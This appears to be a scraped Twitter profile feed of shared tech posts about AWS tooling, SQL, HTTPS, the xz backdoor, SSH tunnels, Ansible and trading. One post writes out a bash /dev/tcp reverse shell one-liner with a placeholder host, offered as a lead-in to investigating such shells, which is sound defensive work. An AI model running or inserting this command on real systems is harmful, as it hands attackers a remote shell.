LinuxGuyAround (@linuxguyaround) 's Twitter Profile
LinuxGuyAround

@linuxguyaround

Enjoying OpenSource !!!

ID: 738876409

calendar_today05-08-2012 16:47:47

14,14K Tweet

1,1K Takipรงi

260 Takip Edilen

Chinmay Naik (@chinmay185) 's Twitter Profile Photo

We open-sourced cloudlens, a k9s-like CLI for AWS - written in Go ๐ŸŽ‰๐Ÿš€ It's like AWS console, but in your terminal. Explore EC2, S3, VPC, IAM, and more services all from your terminal! Check out - code github.com/one2nc/cloudleโ€ฆ and - documentation one2n.gitbook.io/docs/

We open-sourced cloudlens, a k9s-like CLI for AWS -  written in Go ๐ŸŽ‰๐Ÿš€

It's like AWS console, but in your terminal. Explore EC2, S3, VPC, IAM, and more services all from your terminal! 

Check out 
- code github.com/one2nc/cloudleโ€ฆ and 
- documentation one2n.gitbook.io/docs/
Dr Milan Milanoviฤ‡ (@milan_milanovic) 's Twitter Profile Photo

๐—ง๐—ผ๐—ฝ ๐Ÿฎ๐Ÿฌ ๐—ฆ๐—ค๐—Ÿ ๐—พ๐˜‚๐—ฒ๐—ฟ๐˜† ๐—ผ๐—ฝ๐˜๐—ถ๐—บ๐—ถ๐˜‡๐—ฎ๐˜๐—ถ๐—ผ๐—ป ๐˜๐—ฒ๐—ฐ๐—ต๐—ป๐—ถ๐—พ๐˜‚๐—ฒ๐˜€ Here is the list of the top 20 SQL query optimization techniques I found noteworthy: 1. Create an index on huge tables (>1.000.000) rows 2. Use EXIST() instead of COUNT() to find an element in the

๐—ง๐—ผ๐—ฝ ๐Ÿฎ๐Ÿฌ ๐—ฆ๐—ค๐—Ÿ ๐—พ๐˜‚๐—ฒ๐—ฟ๐˜† ๐—ผ๐—ฝ๐˜๐—ถ๐—บ๐—ถ๐˜‡๐—ฎ๐˜๐—ถ๐—ผ๐—ป ๐˜๐—ฒ๐—ฐ๐—ต๐—ป๐—ถ๐—พ๐˜‚๐—ฒ๐˜€ 

Here is the list of the top 20 SQL query optimization techniques I found noteworthy:

1. Create an index on huge tables (>1.000.000) rows
2. Use EXIST() instead of COUNT() to find an element in the
Sahn Lam (@sahnlam) 's Twitter Profile Photo

How does HTTPS work? Hypertext Transfer Protocol Secure (HTTPS) is an extension of HTTP that utilizes Transport Layer Security (TLS) to encrypt communication between a client and server. Any intercepted data will be unreadable and secure from tampering and eavesdropping.

How does HTTPS work?

Hypertext Transfer Protocol Secure (HTTPS) is an extension of HTTP that utilizes Transport Layer Security (TLS) to encrypt communication between a client and server.  Any intercepted data will be unreadable and secure from tampering and eavesdropping.
HaxRob (@haxrob) 's Twitter Profile Photo

Plans to literally "hack the planet" foiled due to 500ms of latency that Andres instinctually investigated. The latency was due how the malicious code parsed symbol tables in memory. openwall.com/lists/oss-secuโ€ฆ

Plans to literally "hack the planet" foiled due to 500ms of latency that Andres instinctually investigated.

The latency was due how the malicious code parsed symbol tables in memory.

openwall.com/lists/oss-secuโ€ฆ
Nikolay Sivko (@nikolaysivko) 's Twitter Profile Photo

Especially for those who often say, "It's always DNS," I'm excited to announce eBPF-based DNS monitoring in Coroot ๐ŸŽ‰ With this new feature, you'll know in seconds whether it was #dns or not ๐Ÿ˜‰ As always, all you need to do is install (or upgrade) Coroot. github.com/coroot/coroot/โ€ฆ

Especially for those who often say, "It's always DNS," I'm excited to announce eBPF-based DNS monitoring in Coroot ๐ŸŽ‰ With this new feature, you'll know in seconds whether it was #dns or not ๐Ÿ˜‰ As always, all you need to do is install (or upgrade) Coroot.  github.com/coroot/coroot/โ€ฆ
Valentin Rothberg (@vlntnrthbrg) 's Twitter Profile Photo

Johnny Westerlund did a great demo on image mode for Red Hat Enterprise Linux with a splash of OpenShift virtualization! youtube.com/watch?v=MzaQGIโ€ฆ

Cedric Clyburn (@cedricclyburn) 's Twitter Profile Photo

Back at Red Hat Summit, the Podman guru Daniel Walsh asked me how we could highlight the amazing open source projects and people out there around Containers, Kubernetes, AI, SELinux, and more! Today, weโ€™re introducing the โ€œRed Hat Dan on Techโ€ mini-series: youtube.com/playlist?list=โ€ฆ

Craig Rowland - Agentless Linux Security (@craighrowland) 's Twitter Profile Photo

One of my favorite reverse shells for Linux is this: bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1 It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it.

One of my favorite reverse shells for Linux is this:
 
bash -i >& /dev/tcp/IP_ADDRESS/PORT 0>&1

It's simple and works on just about every Linux system without elaborate payloads. Let's discuss how to investigate it.
Ivan Velichko (@iximiuz) 's Twitter Profile Photo

SSH Tunnels - A Visual Guide To Port Forwarding ๐Ÿงต One of my favorite parts of SSH is tunneling. With just the regular ssh client, you can do wonders! 1. Local Port forwarding Access private ports of a remote machine using local tools (your browser, a fancy DB UI client, etc)

SSH Tunnels - A Visual Guide To Port Forwarding ๐Ÿงต

One of my favorite parts of SSH is tunneling. With just the regular ssh client, you can do wonders!

1. Local Port forwarding

Access private ports of a remote machine using local tools (your browser, a fancy DB UI client, etc)
Roger Lopez (@lopez) 's Twitter Profile Photo

Ansible PRO TIP: Take advantage of โ€˜blockโ€™ to group tasks and apply common attributes or error handling. It helps to simplify your playbook structure and manage task execution flow.

Ansible PRO TIP:

Take advantage of โ€˜blockโ€™ to group tasks and apply common attributes or error handling.

It helps to simplify your playbook structure and manage task execution flow.
David K ๐ŸŽน (@davidkpiano) 's Twitter Profile Photo

Just discovered that you can enable tab-completions for npm commands pretty easily. Wish I did this years ago ๐Ÿคฏ npm completion >> ~/.bashrc npm completion >> ~/.zshrc

DC (@__dc77) 's Twitter Profile Photo

Price trades to and from ... PIVOTS ... ๐ŸŽฏโฌ‡๏ธ - PERIOD If you don't have these lines on your charts and you are trading futures ... gtfoh ๐Ÿš€ If you would prefer to trade with an informed view, do these things: โฌ‡๏ธ 1) like this post 2) comment PIVOT and tag two friends 3) repost

DC (@__dc77) 's Twitter Profile Photo

Ryan I fixed your indicator bro Ryan .... tooยฐ felt the need to block me over it ... like wtf bro - I looked up to you tooยฐ. Something doesn't make sense here. If you are interested in putting the corrected version out there to your people hit me up. Look forward to

<a href="/DodgysDD/">Ryan</a> I fixed your indicator bro <a href="/DodgysDD/">Ryan</a>  .... <a href="/toodegrees/">tooยฐ</a> felt the need to block me over it ... like wtf bro - I looked up to you tooยฐ.  Something doesn't make sense here.  If you are interested in putting the corrected version out there to your people hit me up.  Look forward to